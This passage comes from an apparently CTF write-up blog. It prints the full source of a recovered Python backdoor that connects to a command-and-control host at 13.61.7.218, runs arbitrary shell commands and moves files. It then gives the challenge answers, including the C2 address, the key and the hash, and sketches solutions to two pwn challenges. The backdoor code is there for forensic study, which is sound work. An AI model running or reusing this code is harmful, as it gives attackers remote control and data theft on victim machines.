 <span class=\"token keyword\">while</span> total_bytes <span class=\"token operator\">&lt;</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>filesize<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        bytes_read <span class=\"token operator\">=</span> client2<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span>BUFFER_SIZE<span class=\"token punctuation\">)</span>\n        msg <span class=\"token operator\">+=</span> bytes_read\n        total_bytes <span class=\"token operator\">+=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>bytes_read<span class=\"token punctuation\">)</span>\n\n    decr_file <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>msg<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>filename<span class=\"token punctuation\">,</span> <span class=\"token string\">'wb'</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>decr_file<span class=\"token punctuation\">)</span>\n\n    client2<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># 攻撃者からの命令を待つメイン関数</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">receive</span><span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n        msg <span class=\"token operator\">=</span> client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span>\n        msg <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>msg<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n        message <span class=\"token operator\">=</span> msg<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">if</span> msg <span class=\"token operator\">==</span> <span class=\"token string\">b''</span><span class=\"token punctuation\">:</span>\n            time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">10</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">continue</span>\n\n        <span class=\"token keyword\">if</span> message <span class=\"token operator\">==</span> <span class=\"token string\">\"check\"</span><span class=\"token punctuation\">:</span>\n            enc_answ <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token string\">\"check-ok\"</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>enc_answ<span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">elif</span> message <span class=\"token operator\">==</span> <span class=\"token string\">\"send_file\"</span><span class=\"token punctuation\">:</span>\n            threading<span class=\"token punctuation\">.</span>Thread<span class=\"token punctuation\">(</span>target<span class=\"token operator\">=</span>receive_file<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>start<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">elif</span> message <span class=\"token operator\">==</span> <span class=\"token string\">\"get_file\"</span><span class=\"token punctuation\">:</span>\n            okenc <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token string\">\"ok\"</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>okenc<span class=\"token punctuation\">)</span>\n\n            path_to_file <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n\n            <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>path_to_file<span class=\"token punctuation\">,</span> <span class=\"token string\">'rb'</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n                bytes_read <span class=\"token operator\">=</span> f<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n            bytes_enc <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span>bytes_read<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            filesize <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>bytes_enc<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>filesize<span class=\"token punctuation\">)</span>\n            vsb <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>sendall<span class=\"token punctuation\">(</span>bytes_enc<span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">elif</span> message <span class=\"token keyword\">not</span> <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token boolean\">None</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'\\n'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n            answer <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>popen<span class=\"token punctuation\">(</span>message<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n            <span class=\"token keyword\">if</span> answer<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">b''</span><span class=\"token punctuation\">:</span>\n                client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span><span class=\"token string\">\"Bad command!\"</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">\"ascii\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">continue</span>\n\n            enc_answer <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span>answer<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            size <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>enc_answer<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>size<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            ch <span class=\"token operator\">=</span> client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> ch <span class=\"token operator\">==</span> <span class=\"token string\">'ok'</span><span class=\"token punctuation\">:</span>\n                client<span class=\"token punctuation\">.</span>sendall<span class=\"token punctuation\">(</span>enc_answer<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># メイン処理</span>\n<span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">\"__main__\"</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n            client <span class=\"token operator\">=</span> socket<span class=\"token punctuation\">.</span>socket<span class=\"token punctuation\">(</span>socket<span class=\"token punctuation\">.</span>AF_INET<span class=\"token punctuation\">,</span> socket<span class=\"token punctuation\">.</span>SOCK_STREAM<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>connect<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token string\">'13.61.7.218'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">55155</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            user <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>popen<span class=\"token punctuation\">(</span><span class=\"token string\">'whoami'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n            k <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>SystemRandom<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>choice<span class=\"token punctuation\">(</span>string<span class=\"token punctuation\">.</span>ascii_letters <span class=\"token operator\">+</span> string<span class=\"token punctuation\">.</span>digits<span class=\"token punctuation\">)</span> <span class=\"token keyword\">for</span> _ <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>user<span class=\"token punctuation\">}</span></span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>SEPARATOR<span class=\"token punctuation\">}</span></span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>k<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>settimeout<span class=\"token punctuation\">(</span><span class=\"token number\">600</span><span class=\"token punctuation\">)</span>\n\n            receive_thread <span class=\"token operator\">=</span> threading<span class=\"token punctuation\">.</span>Thread<span class=\"token punctuation\">(</span>target<span class=\"token operator\">=</span>receive<span class=\"token punctuation\">,</span> args<span class=\"token operator\">=</span><span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n            receive_thread<span class=\"token punctuation\">.</span>start<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">except</span><span class=\"token punctuation\">:</span>\n            time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">50</span><span class=\"token punctuation\">)</span></code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 4. What is the IP address and port used by the malware to establish a connection with the Command and Control (C2) server?</span>\n<span class=\"token number\">13.61</span>.7.218\n\n<span class=\"token comment\"># 5. What encryption key did the attacker use to secure the data?</span>\n5UUfizsRsP7oOCAq</code></pre></div>\n<p>Finally, I decrypted the byte data extracted from the packet capture using this key.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/73559b8ccae9ce3d802640fc25d55b8f/636d3/image-20250323180725235.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABHUlEQVQoz11Qy07DMBDsr1BUGqkK9Bmljp1IHMoFqeLCAYm8+1PNw0Jqv3OZtePQcljN7npndtaTqMsp1iWpviTOGVVfGJRADjcjuszUia5M7uqozSi+nig4vdHECd2SZZ8bZIITZsGoz29minGxgKC61lbQDYvBnXVrSSxgHKPHrv6LWYeoO/Qv1SCIgUTXo/24/ztfjmS7xBDveiXt25QU+upS07Y+4GRslxrb2I2257EzDmGwGHBwrMu7EJ11qPCHO+OwweciwvM3yQYiTUqyBbnhyEwuzqmZiZCbNwS7kq7Gu/wpKajg8P3rgw6fR9q8hvSS7GghljTbLmiJ3Fcbmgc+rfHmhc/0sJrTdO2NOF15Bh+Bs71PT+D9Am5gKIr0BonSAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/73559b8ccae9ce3d802640fc25d55b8f/8ac56/image-20250323180725235.webp 240w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/d3be9/image-20250323180725235.webp 480w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/e46b2/image-20250323180725235.webp 960w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/41bb6/image-20250323180725235.webp 1222w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/73559b8ccae9ce3d802640fc25d55b8f/8ff5a/image-20250323180725235.png 240w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/e85cb/image-20250323180725235.png 480w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/d9199/image-20250323180725235.png 960w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/636d3/image-20250323180725235.png 1222w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/73559b8ccae9ce3d802640fc25d55b8f/d9199/image-20250323180725235.png\"\n            alt=\"image-20250323180725235\"\n            title=\"image-20250323180725235\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>In the end, by obtaining the hash of the PDF file decrypted with the following code, I was able to collect all the Flags.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"download.dat\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    data <span class=\"token operator\">=</span> f<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nkey <span class=\"token operator\">=</span> <span class=\"token string\">\"5UUfizsRsP7oOCAq\"</span>\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"ans\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>dec_mes<span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">,</span>key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># 8fde053c8e79cf7e03599d559f90b321</span></code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 6, What is the MD5 hash of the file exfiltrated by the attacker?</span>\n8fde053c8e79cf7e03599d559f90b321</code></pre></div>\n<h2 id=\"blessingpwn\" style=\"position:relative;\"><a href=\"#blessingpwn\" aria-label=\"blessingpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Blessing(Pwn)</h2>\n<blockquote>\n<p>In the realm of Eldoria, where warriors roam, the Dragon’s Heart they seek, from bytes to byte’s home. Through exploits and tricks, they boldly dare, to conquer Eldoria, with skill and flair.</p>\n</blockquote>\n<p>Analyzing the ELF file provided as the challenge binary showed that the following function was implemented.</p>\n<p>Looking at this code, you can see that if you can overwrite the first value of the heap allocated by <code class=\"language-text\">malloc(0x30000)</code> from 1 to 0, you can obtain the Flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 832px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b61c5d31ce46479cd474968f65147d15/ef6b9/image-20250324184413573.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 97.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACY0lEQVQ4y41TWXbiQBDzVRJvvXs3DkkgMSbLy8/c/zIaVbNkVuBDr9ptkFVSVTLvF+w/FrzuP7G8L8Qe89s76w67tw9iIfZ8/sTmdb6K5D4rkBcltDHwoUKWy3NxrnmpkPKclgXu0gx39+mh/gfJ03ZLBV94//qBef/Gr7xi3s14mXeY5xkL1b7sFmyo9HGzxfp5cxGJ8QHDasTTZo2279EOA0JTwRKmrlBog9JYKEJbdxVJxnatkPYtuq7HMIzomhr+CKVIWGqk/N19ll9FIh41/OO0mhBCi7bp4WwFVRhoZWGNh9GOXuroqwi4hKRQGt4buOBjAFkpLxiG0ciVOiiTUI5kMaD8AmFJj4w1sNbCVzV9a2FCjdJZemcgH7ym6gT5WFSYEzVVdmMHO40kC0hPvuT5UdV1fLdMNdZ5aHpVFAr5saWCFpR8L1XskICkFvSzPJ7L4/msUC7ryuNx1RMT1sOEoRsxjhPvW3gb4ocUA5Kz0jaG5ORMIglNzhLambCpA1Zjj4kkz9MaD6xDv0LN1OXHokCTKLgqVmMcyatI7kjoeV/8TlhhPXXo+oFD/oC2G+KQykBLMNnRgvyXAHJa8+ddJCy1jnvsvOMceoSq4gjVN83cP8dGaSGz6NuAlkp7DvbQjLFVy9aCqyOkbbmTtqVVafl0rvj+4KOiQiUKNdePuxs67q6N4xJbKIqbR+YEjo2KflXBcXQOtWmaw5A3Ifp4bumW1ZOWFRUGJu2IEJgc59J72ZwQiXXtoXiXZjfusmIobePR0kcZ8O+d/XsTru5ynHYmLbtsCKX1xV29pvAnnhRaKJto6e0AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b61c5d31ce46479cd474968f65147d15/8ac56/image-20250324184413573.webp 240w,\n/static/b61c5d31ce46479cd474968f65147d15/d3be9/image-20250324184413573.webp 480w,\n/static/b61c5d31ce46479cd474968f65147d15/de44a/image-20250324184413573.webp 832w\"\n              sizes=\"(max-width: 832px) 100vw, 832px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b61c5d31ce46479cd474968f65147d15/8ff5a/image-20250324184413573.png 240w,\n/static/b61c5d31ce46479cd474968f65147d15/e85cb/image-20250324184413573.png 480w,\n/static/b61c5d31ce46479cd474968f65147d15/ef6b9/image-20250324184413573.png 832w\"\n            sizes=\"(max-width: 832px) 100vw, 832px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b61c5d31ce46479cd474968f65147d15/ef6b9/image-20250324184413573.png\"\n            alt=\"image-20250324184413573\"\n            title=\"image-20250324184413573\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>There did not seem to be a usable BoF, but I found the clearly suspicious code <code class=\"language-text\">(buf + var_30 -1) = 0</code>, so I abused that instead.</p>\n<p>Since <code class=\"language-text\">malloc</code> returns 0 when it fails to allocate memory, this looked exploitable.</p>\n<p>Fortunately, the address of the memory region allocated by <code class=\"language-text\">malloc(0x30000)</code> was large enough to cause <code class=\"language-text\">malloc</code> to overflow, so simply providing that value as input was enough to obtain the Flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 931px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dbedc1ddd2439449c285045cc03a7071/82b28/image-20250324184350589.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 63.74999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVklEQVQ4y52T2XKDMAxFIQEMNtgsJmxZmq3ptJ0u0///tltL0M606UPDgwZhm6N7JeOV/QEqr1FvL2gPz6g39yj7PdJiBc/zbg+7PqFod2j2T+jPb7CbM7Ttucgs4HB+x2r7gPXlA6YeWGFz98j5LKCuOkRJiu74gqLZsfWi2UIZOw+YVa1Ts0Z/ekU1HEEFgiieb5lAZHEZRCB4595JbebAs4BkL282EDJjCKmkQSVZOR7w/T8+9Kf4tU+5kMZ9XHDPpC4RhAJRrDiCKHFrFWI1nknSnAtTTk+hNOJpLXY5zcLLrHH9KvkQAWmTNqiPBF2G0W2WVZFBmoIhVI16GQrpnqGDCfiL5W1AIUm+/qGMYFEy2qZ131/8H5h3JVtOy9ZFwxeargxdH8q1HUbFTi0Vox4HU66UugZKo91AKmfbfg+GB/AVrg1xajg4V2Z6z2Hr6//9E6LDG6PFSpnGAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dbedc1ddd2439449c285045cc03a7071/8ac56/image-20250324184350589.webp 240w,\n/static/dbedc1ddd2439449c285045cc03a7071/d3be9/image-20250324184350589.webp 480w,\n/static/dbedc1ddd2439449c285045cc03a7071/c4004/image-20250324184350589.webp 931w\"\n              sizes=\"(max-width: 931px) 100vw, 931px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dbedc1ddd2439449c285045cc03a7071/8ff5a/image-20250324184350589.png 240w,\n/static/dbedc1ddd2439449c285045cc03a7071/e85cb/image-20250324184350589.png 480w,\n/static/dbedc1ddd2439449c285045cc03a7071/82b28/image-20250324184350589.png 931w\"\n            sizes=\"(max-width: 931px) 100vw, 931px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dbedc1ddd2439449c285045cc03a7071/82b28/image-20250324184350589.png\"\n            alt=\"image-20250324184350589\"\n            title=\"image-20250324184350589\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"laconicpwn\" style=\"position:relative;\"><a href=\"#laconicpwn\" aria-label=\"laconicpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Laconic(Pwn)</h2>\n<blockquote>\n<p>Sir Alaric’s struggles have plunged him into a deep and overwhelming sadness, leaving him unwilling to speak to anyone. Can you find a way to lift his spirits and bring back his courage?</p>\n</blockquote>\n<p>Analyzing the provided file showed that it was a tiny shellcode-style binary like the following.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 450px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0297a8817507afcbf932806d5ee4c7fe/fc2a6/image-20250324185609620.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 44.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABxUlEQVQoz52Ry3LaQBBF9T0BCT1HM3oghHhIxpCEOHGggBRgOzZ2VskuH3/SUqWorLO4NT0j9Z2ecy3bcRh4Hq7vd2rr/5Un/ZYXhgTDEj1tUMUYNwixXQ/H87FFzl91tR9c63/VnUmPH0ZYYW7IPtckyzHZekqQa8oyRycxPWcgF0RUkymh0cS3I1wd0bcHnYE9cK/qi9rhLDVMKL425GKWr2cEiWZWV6R52t3uq5jJfI5JU6rZjCzP8bVBVROM7KNRiblp0LM5sTFY09UNx98/OPz8zuHXC5vTkefLEw/Pj9zvDmy/HXm6vHI4P7K/vLF/eWV/fmC5vWP7dmR3OrM5ntjJ98VqhaVHGZP9e8ZfGqrNkqQasVzVlFUpT4hJ8oIPH9cMJxWjuwXj+1vScoTOMpIiR5mEqJ1Y1m7CMNOkn6bCsCRuio7RsEjFcCjKBHTIoA3DFVaeixN4wtbhXa9Pz3Y6dq1a3l4QYEXCcLhpJBBhsihxY8VYzGa1JC88W7M2eS9JCcsxfiYM05y4rglkIqcNx/XpdylLKKEYxEVGLMYqNQRKoSVRk5juh1ZKGpU8MZZAVJaiZNVlKeeaIIquiqT3D61pM0xKsS1fAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0297a8817507afcbf932806d5ee4c7fe/8ac56/image-20250324185609620.webp 240w,\n/static/0297a8817507afcbf932806d5ee4c7fe/8626f/image-20250324185609620.webp 450w\"\n              sizes=\"(max-width: 450px) 100vw, 450px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0297a8817507afcbf932806d5ee4c7fe/8ff5a/image-20250324185609620.png 240w,\n/static/0297a8817507afcbf932806d5ee4c7fe/fc2a6/image-20250324185609620.png 450w\"\n            sizes=\"(max-width: 450px) 100vw, 450px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0297a8817507afcbf932806d5ee4c7fe/fc2a6/image-20250324185609620.png\"\n            alt=\"image-20250324185609620\"\n            title=\"image-20250324185609620\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Also, no security mitigations were enabled in particular.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/afa26/image-20250324190144622.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15.833333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiUlEQVQI15XK2w6CMBBF0RZUNNBY8Aa0FguKROP/f962KBpffViZOWdGlL7g/DAYv6EfrrT9jeYyUDuPaTqqo+dgHKU9sa8su9K+5pitcxhTo3ONUoosSxFZqvBtxyqecw+FWyboZEEkBFIKokgiwh5N++jTS/k23r+0XpNvC+IQuskpmP0+/eEJKK9EQtWWxAMAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/8ac56/image-20250324190144622.webp 240w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/d3be9/image-20250324190144622.webp 